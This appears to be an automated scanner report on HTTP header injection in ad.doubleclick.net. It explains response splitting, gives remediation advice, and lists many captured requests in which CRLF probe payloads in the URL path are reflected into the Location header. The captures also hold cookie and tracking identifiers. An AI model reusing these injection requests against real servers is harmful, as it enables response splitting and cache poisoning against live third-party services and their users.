HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 1 is copied into the Location response header. The payload 1a606%0d%0a253b87d272 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1a606%0d%0a253b87d272/N1558.150143.1172954780521/B5214024.6;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B7HRFJxxYTYDwJczQlQfXxtmaC5XGqvYBhaae2x7AjbcB0ICCARABGAEgvs7lDTgAUJOX3br6_____wFgyYajh9SjgBCgAfuI8N0DugEJNzI4eDkwX2FzyAEJ2gFKZmlsZTovLy9DOi9Vc2Vycy9jcmF3bGVyL0RvY3VtZW50cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG24AhjIAq2L-hmoAwHRA4KN5ubLonGu6AO6AugDzQH1AwAAAMQ&num=1&sig=AGiWqtwYWRPDkNEftYzB5fG84_muYyZFaw&client=ca-pub-4063878933780912&adurl=;ord=1049337642? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297641628&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297620028788&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297620028811&frm=0&adk=200505236&ga_vid=614311644.1297620029&ga_sid=1297620029&ga_hid=1517882856&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&fu=0&ifi=1&dtd=51&xpc=GMAjg2OnbV&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 9d44e%0d%0a869be57a127 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9d44e%0d%0a869be57a127/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BrcJrbvtXTf6TNIT2lQfNubWcC42HpOsBhaKK8hLjqLazM-CE7gEQARgBIL7O5Q04AFDEwrTWBmDJhqOH1KOAEKABo67u9gOyARBjZG4uY2xvdWRzY2FuLnVzugEJNzI4eDkwX2FzyAEJ2gFeaHR0cDovL2Nkbi5jbG91ZHNjYW4udXMvZXhhbXBsZXMvaHRtbC91c2VyLWFnZW50LWh0dHAtaGVhZGVyLXhzcy1leGFtcGxlLXBvYy13d3dhbWF6b25jb20uaHRtbLgCGMACBcgC5e_FGKgDAdEDgo3m5suica71AwAAAMQ&num=1&sig=AGiWqtznA6d-3GhQY0LBGCyoAOJXFnbytA&client=ca-pub-4063878933780912&adurl=;ord=771430114? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297633216&flash=10.2.154&url=http%3A%2F%2Fcdn.cloudscan.us%2Fexamples%2Fhtml%2Fuser-agent-http-header-xss-example-poc-wwwamazoncom.html&dt=1297611638827&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297611638849&frm=0&adk=1607234649&ga_vid=1005309629.1297611639&ga_sid=1297611639&ga_hid=1032767937&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=994&bih=1010&fu=0&ifi=1&dtd=64&xpc=5uyat7KDmc&p=http%3A//cdn.cloudscan.us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 25b51%0d%0aff0eb37d473 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /25b51%0d%0aff0eb37d473/N5214.3541.OVERSTOCK.COM/B2885999.13;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BK95zEwpYTdCGEt_ulQe2qMWaC93uresBjZXWqBy1x-_rWQAQARgBIL7O5Q04AFDnr7C1BGDJhqOH1KOAELoBCTcyOHg5MF9hc8gBCdoBWGZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2V4cGxvaXRzL3VyaS1jbGljay10by1leGVjdXRlLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy5odG1sLmh0bWyYArYCuAIYwAIFyALlwo0VqAMB0QOCjebmy6JxrugDugLoA-IF9QMAAADE&num=1&sig=AGiWqty2NvaoNMLveUXjvsdkZWujyawEuQ&client=ca-pub-4063878933780912&adurl=;ord=1948801322? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636995&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615395709&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615395737&frm=0&adk=1607234649&ga_vid=1506605237.1297615396&ga_sid=1297615396&ga_hid=1161322831&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143102&fu=0&ifi=1&dtd=79&xpc=jj0vJF01eu&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 177bd%0d%0ac3a4c9955b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /177bd%0d%0ac3a4c9955b/N5552.3159.GOOGLECN.COM/B4988140.18;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BqX6JTwxYTeqUGufplQef56ShC-WUxIECpcrawx293_u4ZgAQARgBIL7O5Q04AFCF5vzj-_____8BYMmGo4fUo4AQsgEJbG9jYWxob3N0ugEJNzI4eDkwX2FzyAEJ2gFaaHR0cDovL2xvY2FsaG9zdC9leGFtcGxlcy9leHBsb2l0cy91cmktY2xpY2stdG8tZXhlY3V0ZS14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuaHRtbC5odG1smAL6AbgCGMACBcgCpY__GqgDAegDugLoA-IF9QMAAADE&num=1&sig=AGiWqty4OCemCEYbUfA29az7nmlfzud5oQ&client=ca-pub-4063878933780912&adurl=;ord=1312776792? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297636642&flash=10.2.154&url=http%3A%2F%2Flocalhost%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297615968703&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297615968724&frm=0&adk=1607234649&ga_vid=972795648.1297615969&ga_sid=1297615969&ga_hid=295279311&ga_fc=0&u_tz=-360&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1112&bih=1010&eid=30143103&ref=http%3A%2F%2Flocalhost%2F&fu=0&ifi=1&dtd=52&xpc=9d1f6bXzju&p=http%3A//localhost Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 94e78%0d%0a645d5eb81b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /94e78%0d%0a645d5eb81b4/N763.N763.GoogleContentNet/B4639841.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BR3Xjuw1YTducGNL6lQeKq8WaC6KPs4cCysjo7RTAjbcB0OlfEAEYASC-zuUNOABQioiJ8QVgyYajh9SjgBCgAfLcs-sDugEJNzI4eDkwX2FzyAEJ2gFYZmlsZTovLy9DOi9jZG4vZXhhbXBsZXMvZXhwbG9pdHMvdXJpLWNsaWNrLXRvLWV4ZWN1dGUteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLmh0bWwuaHRtbLgCGMgCmprFFqgDAdEDgo3m5suica7oA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtzXFtYkVq0bmudz_sj6EVeUl3e5UQ&client=ca-pub-4063878933780912&adurl=;ord=405226418? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297637934&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Furi-click-to-execute-xss-cross-site-scripting.html.html&dt=1297616334663&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297616334682&frm=0&adk=1607234649&ga_vid=1527264931.1297616335&ga_sid=1297616335&ga_hid=1186706569&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&fu=0&ifi=1&dtd=57&xpc=v34befYgjb&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 4c782%0d%0ab14eff0665b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4c782%0d%0ab14eff0665b/N4319.AOLMEN/B3889342.3;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000790494/mnum=0000972261/cstr=1367174=_4d572fb6,7110056810,790494%5E972261%5E65%5E0,1_/xsxdata=$xsxdata/bnum=1367174/optn=64?trg=;ord=7110056810? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 7705d%0d%0ab0ea55ca902 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7705d%0d%0ab0ea55ca902/footer.nasdaq.com/fidelity;tile=11;;abr=!webtv;key=value;sz=120x60;ord=%7B793802500935271400%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/aspx/market-headlines.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7705d b0ea55ca902/footer.nasdaq.com/fidelity;tile=11;;abr=!webtv;key=value;sz=120x60;ord={793802500935271400}: Date: Sun, 13 Feb 2011 01:44:28 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 62c40%0d%0a0652e203bb0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /62c40%0d%0a0652e203bb0/home.nasdaq.com/;tile=6;;abr=!webtv;key=value;sz=120x60;ord=%7B563948719995096300%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.nasdaq.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/62c40 0652e203bb0/home.nasdaq.com/;tile=6;;abr=!webtv;key=value;sz=120x60;ord={563948719995096300}: Date: Sun, 13 Feb 2011 01:54:58 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 2a5df%0d%0afc3eb0af9a7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2a5df%0d%0afc3eb0af9a7/home.nasdaq.com/ROSToolbar;tile=2;;abr=!webtv;key=value;sz=185x35;ord=%7B121342767495661970%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/aspx/market-headlines.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2a5df fc3eb0af9a7/home.nasdaq.com/ROSToolbar;tile=2;;abr=!webtv;key=value;sz=185x35;ord={121342767495661970}: Date: Sun, 13 Feb 2011 01:44:23 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 81e4c%0d%0a1ffd78c1dc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /81e4c%0d%0a1ffd78c1dc/home.nasdaq.com/home;tile=1;;abr=!webtv;key=value;sz=728x90;ord=%7B559788043843582300%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/81e4c 1ffd78c1dc/home.nasdaq.com/home;tile=1;;abr=!webtv;key=value;sz=728x90;ord={559788043843582300}: Date: Sun, 13 Feb 2011 02:13:12 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 69278%0d%0a74b1f29c7f9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /69278%0d%0a74b1f29c7f9/home.nasdaq.com/home3;tile=6;;abr=!webtv;key=value;sz=120x60;ord=%7B353306817589327700%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.nasdaq.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/69278 74b1f29c7f9/home.nasdaq.com/home3;tile=6;;abr=!webtv;key=value;sz=120x60;ord={353306817589327700}: Date: Sun, 13 Feb 2011 01:58:47 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 7051b%0d%0ab920e046081 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7051b%0d%0ab920e046081/home.nasdaq.com/home6;tile=1;;abr=!webtv;key=value;sz=728x90;ord=%7B788932431722059900%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.nasdaq.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7051b b920e046081/home.nasdaq.com/home6;tile=1;;abr=!webtv;key=value;sz=728x90;ord={788932431722059900}: Date: Sun, 13 Feb 2011 01:55:11 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 75f27%0d%0a6c3c570ede2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /75f27%0d%0a6c3c570ede2/invprod.nasdaq.com/etfs;tile=1;;abr=!webtv;key=value;sz=728x90;ord=%7B994284154148772400%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/investing/etfs/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/75f27 6c3c570ede2/invprod.nasdaq.com/etfs;tile=1;;abr=!webtv;key=value;sz=728x90;ord={994284154148772400}: Date: Sun, 13 Feb 2011 01:45:05 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 9caf3%0d%0a9b5f4bccf9b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9caf3%0d%0a9b5f4bccf9b/invprod.nasdaq.com/heatmap;tile=4;;abr=!webtv;key=value;sz=120x60;ord=%7B785258022835478100%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://quotes.nasdaq.com/screening/heatmaps.stm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/9caf3 9b5f4bccf9b/invprod.nasdaq.com/heatmap;tile=4;;abr=!webtv;key=value;sz=120x60;ord={785258022835478100}: Date: Sun, 13 Feb 2011 02:13:30 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 67566%0d%0a9102e73c4e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /67566%0d%0a9102e73c4e/invprod.nasdaq.com/heatmap_n100;tile=1;;abr=!webtv;key=value;sz=728x90;ord=%7B53870897507295016%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://quotes.nasdaq.com/screening/heatmaps.stm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/67566 9102e73c4e/invprod.nasdaq.com/heatmap_n100;tile=1;;abr=!webtv;key=value;sz=728x90;ord={53870897507295016}: Date: Sun, 13 Feb 2011 02:12:53 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 3309e%0d%0a28a7430a9db was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3309e%0d%0a28a7430a9db/mktsnews.nasdaq.com/;tile=3;;abr=!webtv;key=value;sz=160x600;ord=%7B914398350287228800%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/aspx/market-headlines.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3309e 28a7430a9db/mktsnews.nasdaq.com/;tile=3;;abr=!webtv;key=value;sz=160x600;ord={914398350287228800}: Date: Sun, 13 Feb 2011 01:44:36 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 60be2%0d%0ab7c112e9940 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /60be2%0d%0ab7c112e9940/mktsnews.nasdaq.com/headlines;tile=1;;abr=!webtv;key=value;sz=728x90;ord=%7B474336534040048700%7D? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nasdaq.com/aspx/market-headlines.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/60be2 b7c112e9940/mktsnews.nasdaq.com/headlines;tile=1;;abr=!webtv;key=value;sz=728x90;ord={474336534040048700}: Date: Sun, 13 Feb 2011 01:44:25 GMT Server: GFE/2.0
